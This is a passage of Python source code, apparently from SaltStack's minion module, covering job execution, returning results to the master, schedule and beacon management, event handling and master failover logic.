ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False, notify=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar. Notify: %s', notify)
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
)
try:
self.opts['pillar'] = yield async_pillar.compile_pillar()
if notify:
evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False)
evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE)
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
finally:
async_pillar.destroy()
self.module_refresh(force_refresh, notify)
self.matchers_refresh()
self.beacons_refresh()
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
'reload': ('reload', (schedule,)),
'list': ('list', (where,)),
'save_schedule': ('save_schedule', ()),
'get_next_fire_time': ('get_next_fire_time',
(name,))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name,)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name,)),
'disable_beacon': ('disable_beacon', (name,)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except AttributeError:
log.error('Function "%s" is unavailable in salt.beacons', func)
except TypeError as exc:
log.info(
'Failed to handle %s with data(%s). Error: %s',
tag, data, exc,
exc_info_on_loglevel=logging.DEBUG
)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.client.ReqChannel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
finally:
channel.close()
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
def _handle_tag_beacons_refresh(self, tag, data):
'''
Handle a beacon_refresh event
'''
self.beacons_refresh()
def _handle_tag_matchers_refresh(self, tag, data):
'''
Handle a matchers_refresh event
'''
self.matchers_refresh()
def _handle_tag_manage_schedule(self, tag, data):
'''
Handle a manage_schedule event
'''
self.manage_schedule(tag, data)
def _handle_tag_manage_beacons(self, tag, data):
'''
Handle a manage_beacons event
'''
self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
def _handle_tag_environ_setenv(self, tag, data):
'''
Handle a environ_setenv event
'''
self.environ_setenv(tag, data)
def _handle_tag_minion_mine(self, tag, data):
'''
Handle a _minion_mine event
'''
self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
def _handle_tag_master_disconnected_failback(self, tag, data):
'''
Handle a master_disconnected_failback event
'''
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
persist=True)
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
def _handle_tag_master_connected(self, tag, data):
'''
Handle a master_connected event
'''
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
tag_functions = {
'beacons_refresh': self._handle_tag_beacons_refresh,
'environ_setenv': self._handle_tag_environ_setenv,
'fire_master': self._handle_tag_fire_master,
'grains_refresh': self._handle_tag_grains_refresh,
'matchers_refresh': self._handle_tag_matchers_refresh,
'manage_schedule': self._handle_tag_manage_schedule,
'manage_beacons': self._handle_tag_manage_beacons,
'_minion_mine': self._handle_tag_minion_mine,
'module_refresh': self._handle_tag_module_refresh,
'pillar_refresh': self._handle_tag_pillar_refresh,
'salt/auth/creds': self._handle_tag_salt_auth_creds,
'_salt_error': self._handle_tag_salt_error,
'__schedule_return': self._handle_tag_schedule_return,
master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
master_event(type='failback'): self._handle_tag_master_disconnected_failback,
master_event(type='connected'): self._handle_tag_master_connected,
}
# Run the appropriate function
for tag_function in tag_functions:
if tag.startswith(tag_function):
tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # In minutes, not seconds!
log.debug(
'Enabling the grains refresher. Will run every %d minute(s).',
self.opts['grains_refresh_every']
)
self._refresh_grains_watcher(abs(self.opts['grains_refresh_every']))
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh '
'routine during minion tune-in: %s', exc
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
